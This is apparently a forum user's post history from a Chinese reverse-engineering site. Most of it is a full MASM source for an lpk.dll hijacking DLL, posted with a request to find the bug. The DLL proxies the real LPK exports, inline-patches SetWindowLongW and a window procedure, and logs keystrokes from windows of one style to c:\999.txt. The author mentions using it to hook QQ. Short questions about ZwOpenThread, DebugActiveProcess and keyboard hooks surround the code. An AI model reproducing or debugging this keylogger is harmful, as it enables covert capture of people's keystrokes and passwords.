|
怎么获取DbgkDebugObjectType地址
无解吗???? |
|
DLL劫持错在那里
.386 .model flat, stdcall option casemap :none ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Include 文件定义 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> include windows.inc include user32.inc includelib user32.lib include kernel32.inc includelib kernel32.lib ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> kbdllhook struct vkCode DWORD ?; scanCode DWORD ?; flags DWORD ?; time DWORD ?; dwExtraInfo DWORD ?; kbdllhook ends .data hInstance dd ? szLpk db 'C:\WINDOWS\system32\lpk.dll',0 szLpkEditControl db 'LpkEditControl',0 lpLpkInitialize db 'LpkInitialize',0 lpLpkTabbedTextOut db 'LpkTabbedTextOut',0 lpLpkDllInitialize db 'LpkDllInitialize',0 lpLpkDrawTextEx db 'LpkDrawTextEx',0 lpLpkEditControl db 'LpkEditControl',0 lpLpkExtTextOut db 'LpkExtTextOut',0 lpLpkGetCharacterPlacement db 'LpkGetCharacterPlacement',0 lpLpkGetTextExtentExPoint db 'LpkGetTextExtentExPoint',0 lpLpkPSMTextOut db 'LpkPSMTextOut',0 lpLpkUseGDIWidthCache db 'LpkUseGDIWidthCache',0 lpftsWordBreak db 'ftsWordBreak',0 szCx db 'c:\999.txt',0 szX db '%c',0 szY db '%x',0 szSetWindowsHookExA db 'SetWindowsHookExA',0 dwSetWindowsHookExA dd ? lpSetWindowLongW db 'SetWindowLongW',0 dwSetWindowLongW dd ? szLoadLibrary db 'LoadLibraryA',0 szKernel32 db 'kernel32',0 szUser32 db 'user32',0 dwUser32 dd ? szCreateWindowExA db 'CreateWindowExA',0 szSetWindowLongA db 'SetWindowLongW',0 szGetActiveWindow db 'GetActiveWindow',0 dwGetActiveWindow dd ? dwkeybd_event db 'keybd_event',0 szSetWindowsHookExW db 'SetWindowsHookExW',0 szSetTimer db 'SetTimer',0 .data? hWnd dd ? hHook dd ? dwMessage dd ? szAscii db 4 dup (?) dwLpk dd ? hFile dd ? dwId dd ? szFu1 db 255 dup (?),0 dwNubla dd ? dwProcAddress dd ? hEvent dd ? lpProc dd ? lpProc1 dd ? hHook1 dd ? dwEvent1 dd ? ppp db 5 dup (?) ggg dd ? dwProcLong dd ? dwMk1 db 6 dup (?) kl1 dd ? hEvent1 dd ? hHook2 dd ? dwStimer dd ? v1 dd ? n1 dd ? y1 dd ? ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> .code ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; dll 的入口函数 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 键盘钩子回调函数 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _HookProc proc _dwCode,_wParam,_lParam local @szKeyState[256]:byte .if _dwCode == HC_ACTION mov eax,_lParam mov ecx,[eax+10h] mov ebx,_lParam assume ebx:ptr kbdllhook .if _wParam ==100h && [ebx].flags !=10h && [ebx].flags!=90h invoke GetActiveWindow invoke GetWindowLongW,eax,GWL_STYLE .if eax ==14c00020h .if !hFile invoke CreateFile,addr szCx,GENERIC_WRITE or GENERIC_READ ,FILE_SHARE_DELETE or FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 mov hFile,eax .endif invoke wsprintf,addr szFu1,addr szX,[ebx].vkCode invoke lstrlen,addr szFu1 invoke WriteFile,hFile,addr szFu1,eax,addr n1,0 ;invoke GetLastError ;invoke wsprintf,addr szFu1,addr szX,eax .endif .endif .endif invoke UnhookWindowsHookEx,hHook xor eax,eax ret _HookProc endp _SetTimer proc invoke GetModuleHandle,0 invoke SetWindowsHookExW,WH_KEYBOARD_LL,addr _HookProc,eax,0 mov hHook,eax ret _SetTimer endp _dwProcLong proc xca db 6 dup (?) pushad mov eax,[ebp+0ch] .if eax ==100h .elseif eax ==WM_TIMER invoke KillTimer,DWORD ptr [ebp+08h],DWORD ptr [ebp+10h] .endif popad mov eax,y1 add eax,6 jmp eax _dwProcLong endp _SetWindowLongW proc k1 db 5 dup (?) mov eax,dwSetWindowLongW add eax,5 pushad invoke GetWindowLongW,DWORD ptr [ebp+8],GWL_STYLE .if eax ==14c00020h && DWORD ptr [ebp+0ch]== -4 invoke GetActiveWindow invoke GetWindowLongW,eax,GWL_WNDPROC .if eax .if eax <[ebp+10h] mov eax,[ebp+10h] .endif mov y1,eax ;invoke wsprintf,addr szFu1,addr szY,y1;y1 ;invoke SendMessage,2623474,WM_SETTEXT,0,addr szFu1 .if !dwStimer invoke SetTimer,0,0,100,addr _SetTimer mov dwStimer,eax .endif mov eax,y1 push ecx invoke VirtualProtect,eax,10,PAGE_READWRITE,esp pop ecx mov eax,y1 .if BYTE ptr [eax] !=0e9h mov esi,eax lea edi,xca mov ecx,6 rep movsb lea ecx,_dwProcLong sub ecx,eax sub ecx,5 mov BYTE ptr [eax],0e9h mov [eax+1],ecx .endif .endif .endif popad jmp eax _SetWindowLongW endp LpkInitialize proc invoke GetProcAddress,dwLpk,addr lpLpkInitialize jmp eax LpkInitialize endp LpkTabbedTextOut proc invoke GetProcAddress,dwLpk,addr lpLpkTabbedTextOut jmp eax LpkTabbedTextOut endp LpkDllInitialize proc invoke GetProcAddress,dwLpk,addr lpLpkDllInitialize jmp eax LpkDllInitialize endp LpkDrawTextEx proc invoke GetProcAddress,dwLpk,addr lpLpkDrawTextEx jmp eax LpkDrawTextEx endp LpkEditControl proc dd 16 dup (?) LpkEditControl endp LpkExtTextOut proc invoke GetProcAddress,dwLpk,addr lpLpkExtTextOut jmp eax LpkExtTextOut endp LpkGetCharacterPlacement proc invoke GetProcAddress,dwLpk,addr lpLpkGetCharacterPlacement jmp eax LpkGetCharacterPlacement endp LpkGetTextExtentExPoint proc invoke GetProcAddress,dwLpk,addr lpLpkGetTextExtentExPoint jmp eax LpkGetTextExtentExPoint endp LpkPSMTextOut proc invoke GetProcAddress,dwLpk,addr lpLpkPSMTextOut jmp eax LpkPSMTextOut endp LpkUseGDIWidthCache proc invoke GetProcAddress,dwLpk,addr lpLpkUseGDIWidthCache jmp eax LpkUseGDIWidthCache endp ftsWordBreak proc invoke GetProcAddress,dwLpk,addr lpftsWordBreak jmp eax ftsWordBreak endp DllEntry1 proc _hInstance,_dwReason,_dwReserved pushad mov ecx,40h push ecx invoke VirtualProtect,addr LpkEditControl,ecx,PAGE_READWRITE,esp pop ecx invoke LoadLibrary,addr szLpk mov dwLpk,eax invoke GetProcAddress,dwLpk,addr szLpkEditControl mov esi,eax lea edi,LpkEditControl mov ecx,40h rep movsb invoke LoadLibrary,addr szUser32 mov dwUser32,eax invoke GetProcAddress,dwUser32,addr szSetWindowLongA mov dwSetWindowLongW,eax push ecx invoke VirtualProtect,dwSetWindowLongW,10,PAGE_READWRITE,esp pop ecx mov eax,dwSetWindowLongW .if BYTE ptr [eax]!=0e9h push ecx invoke VirtualProtect,_SetWindowLongW,10,PAGE_READWRITE,esp pop ecx mov esi,dwSetWindowLongW lea edi,k1 mov ecx,5 rep movsb mov eax,dwSetWindowLongW mov ecx,offset _SetWindowLongW sub ecx,eax sub ecx,5 mov BYTE ptr [eax],0e9h mov [eax+1],ecx .endif push ecx invoke VirtualProtect,_dwProcLong,10,PAGE_READWRITE,esp pop ecx popad or eax,1 ret DllEntry1 Endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> End DllEntry1 |
|
DLL劫持错在那里
HOOK QQ时他掉线了 |
|
[求助]WH_JOURNALRECORD钩子,为什么不执行回调函数?
好象是驱动精灵的驱动搞的鬼 |
|
劫持LPK的问题
谢谢大家这个问题已解决 |
|
|
|
ZwOpenThread怎么用
要传入立即数的是那个参数啊!大哥出来帮帮忙啊! |
|
ZwOpenThread怎么用
我这个全局变量的! |
|
ZwOpenThread怎么用
大哥新手不会用宏,你用Win32汇编的格式给我示范一遍!帮帮忙我找了一天的资料了!除了汇编会一点其它的语言看不懂! |
|
DebugActiveProcess返回5
谢谢!用 调试权限被清零 的确找到少! |
|
DebugActiveProcess返回5
没人知道吗! |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值